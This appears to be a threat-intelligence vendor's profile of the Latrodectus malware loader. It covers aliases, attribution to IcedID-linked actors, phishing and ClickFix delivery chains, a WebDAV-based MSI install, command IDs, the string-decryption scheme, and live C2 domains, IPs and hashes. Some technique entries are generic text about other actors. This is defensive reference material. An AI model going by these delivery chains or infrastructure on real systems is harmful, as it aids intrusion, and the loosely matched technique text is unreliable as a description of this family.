Latrodectus
Latrodectus is a malware loader/downloader first observed in late 2023 and documented in 2024, also referred to in the provided content as IceNova Backdoor, Unidentified 111, BlackWidow, and Icenova. Multiple sources in the content describe it as a likely successor or evolution of IcedID and attribute development ties to IcedID-associated operators. It has been linked in reporting to campaigns associated with TA578, Storm-0249, Trickbot/WIZARD SPIDER, Conti, and LUNAR SPIDER, and has also been noted in activity overlapping with Rhysida operations. The malware has been characterized as an initial-access loader that can bridge delivery to post-exploitation tooling and additional payloads, including Brute Ratel C4 and Rhadamanthys.
Observed delivery vectors in the content include phishing and reply-chain phishing emails with malicious attachments, malicious spam campaigns using JavaScript files, tax-themed phishing, compromised websites, malvertising, SEO poisoning, fake CAPTCHA/ClickFix lures, and MSI-based infection chains. One described chain used a JavaScript downloader to map a remote share at \wireoneinternet.info@80\share\ and silently install slack.msi via msiexec.exe. Another campaign used ClickFix to trick users into executing PowerShell that downloaded Latrodectus v2.3. The content also notes distribution through malicious email attachments and user execution of those attachments.
Capabilities directly described in the content include downloading and deploying additional malware, executing commands, stealing or exfiltrating encrypted system information to command-and-control servers, maintaining persistence through scheduled tasks, and communicating with C2 over HTTP POST with Base64-encoded request bodies. Latrodectus has used WMI in malicious email infection chains to facilitate installation of remotely hosted files. Technical analyses in the content state that it gathers host information including computer name, user name, and network adapter details, creates a mutex to detect prior infection, copies itself into AppData\Roaming\Custom_update as Update_<random>.dll, deletes the original payload path, and relaunches itself with rundll32 using exports such as homi or scub. One report also describes persistence via a Windows Run key, while another notes scheduled-task persistence.
The malware uses runtime string decryption and API hashing. The provided reverse-engineering content states that Latrodectus implements a custom XOR-based string decryption routine in which the first and fifth bytes determine encrypted block length, the first six bytes act as a control header, and subsequent bytes are decrypted with an incrementing XOR key derived from the first byte. Another technical analysis states that the main DLL reconstructs imports at runtime using CRC32-based API hashing. The content also highlights sandbox evasion and anti-analysis behavior.
C2 and infrastructure details explicitly mentioned include communication with https://titnovacrion.top/live/ and https://skinnyjeanso.com/live/, use of attacker-controlled domains in ClickFix campaigns, and HTTP communications with Base64-encoded data. Additional reporting in the content ties Latrodectus infrastructure to daily-rotating pseudo-random .top domains on 45.61.136.30, domains registered through NICENIC, and phishing infrastructure on 193.106.174.218 using HTTP 302 redirects. The content also notes sightings of Latrodectus-related infrastructure on Russian hosting and on AS202412/OMEGATECH-associated malicious infrastructure.
Targeting described in the content includes financial-sector organizations and broader enterprise victims reached through phishing and web-based social engineering. Related campaigns referenced tax-themed lures, invoice/payment themes, and fake verification or CAPTCHA prompts. High-confidence indicators mentioned in the content include wireoneinternet.info, titnovacrion.top, skinnyjeanso.com, jkbarmossen.com, statifaronta.com, 45.61.136.30, 193.106.174.218, and sample hashes such as fad25892e5179a346cdbdbba1e40f53bd6366806d32b57fa4d7946ebe9ae8621, 65da6d9f781ff5fc2865b8850cfa64993b36f00151387fdce25859781c1eb711, b9dbe9649c761b0eee38419ac39dcd7e90486ee34cd0eb56adde6b2f645f2960, and 17014299f399f71d1d6bed136b8c624a366b222166e692522d14e2bba70bb79f.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Threat Details and IOCs Malware: ... Latrodectus ...
Groups observed using it
10 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.
Proofpoint first observed new malware named Latrodectus appear in email threat campaigns in late November 2023. Latrodectus is an up-and-coming downloader with various sandbox evasion functionality.
Proofpoint first observed new malware named Latrodectus appear in email threat campaigns in late November 2023. Latrodectus is an up-and-coming downloader with various sandbox evasion functionality.
Latrodectus, also known as IceNova Backdoor ... is a family of malware that has been observed lately in campaigns linked to groups such as Trickbot ( WIZARD SPIDER ) and Conti (and potentially, in Ransomware deliveries), in addition to being attributed to developers from IcedID . Therefore, Latrodectus has been highlighted as a potential threat and is used as a Loader for other malware.
Latrodectus, also known as IceNova Backdoor ... is a family of malware that has been observed lately in campaigns linked to groups such as Trickbot ( WIZARD SPIDER ) and Conti (and potentially, in Ransomware deliveries), in addition to being attributed to developers from IcedID . Therefore, Latrodectus has been highlighted as a potential threat and is used as a Loader for other malware.
Latrodectus, also known as IceNova Backdoor ... is a family of malware that has been observed lately in campaigns linked to groups such as Trickbot ( WIZARD SPIDER ) and Conti (and potentially, in Ransomware deliveries), in addition to being attributed to developers from IcedID . Therefore, Latrodectus has been highlighted as a potential threat and is used as a Loader for other malware.
The tweet details a Latrodectus infection leveraging phishing links to redirect victims to a javascript file, which ultimately loads LummaStealer Malware.
LUNAR SPIDER’s recent campaign used Latrodectus, a heavily obfuscated JavaScript loader, to deliver Brute Ratel C4 payloads targeting the financial sector.
Bumblebee and Latrodectus, which are both malware loaders, are designed to steal personal data, along with downloading and executing additional payloads onto compromised hosts.
In addition to OysterLoader, Expel discovered the Rhysida threat actors were also using Latrodectus malware in its campaign...
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquescampaigns using RaccoonO365 have been active since September 2024. These attacks typically mimic trusted brands like Microsoft, DocuSign, SharePoint, Adobe, and Maersk in fraudulent emails, tricking them into clicking on lookalike pages that are designed to capture victims' Microsoft 365 usernames and passwords.
Latrodectus has used JavaScript files as part its infection chain during malicious spam email campaigns. Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.
On 28 November 2023, Proofpoint observed the last TA577 Latrodectus campaign. The campaign began with thread hijacked messages that contained URLs leading to either zipped JavaScript files or zipped ISO files. | This actor typically uses contact forms to initiate a conversation with a target.
Execution
6 techniquesThe content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
AppleSeed has the ability to use JavaScript to execute PowerShell. APT32 has used JavaScript for drive-by downloads and C2 communications. Astaroth uses JavaScript to perform its core functionalities.
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365
Persistence
3 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Privilege Escalation
2 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Stealth
10 techniquesThe content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Latrodectus resolves Windows API functions dynamically by hash
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
The MSI executed the bundled DLL with the export "fin" to run Latrodectus.
If this JavaScript was executed, it called MSIEXEC to run an MSI from a WebDAV share.
Defense Impairment
1 techniqueDiscovery
6 techniquesThe content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
cmd_get_desktop_items 2 Get the filenames of files on the desktop
Collection
1 techniqueThe content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
Command and Control
5 techniquesBS2005 uses Base64 encoding for communication in the message body of an HTTP request... Helminth encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values... RDAT can communicate with the C2 via base32-encoded subdomains.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
The commands Latrodectus supports currently: cmd_exec_exe 12 Execute executable; cmd_exec_dll 13 Execute DLL with given export; cmd_run_icedid 18 Download bp.dat and execute
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
On 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
Exfiltration
1 techniqueADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
221 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
73 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware delivered via a fake CAPTCHA ClickFix lure that tricks users into running a PowerShell command, after which it communicates with attacker-controlled domains.
Referenced as a comparable loader-for-hire occupying the same operational niche as MintsLoader.
Loader malware family identified as using infrastructure within the same subnet.
A stage-2 payload and active C2 framework delivered after IcedID infection. It uses rotating .top domains on shared infrastructure, maintains persistent beaconing, and is described as the current evolution/successor of the operator's IcedID toolkit.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.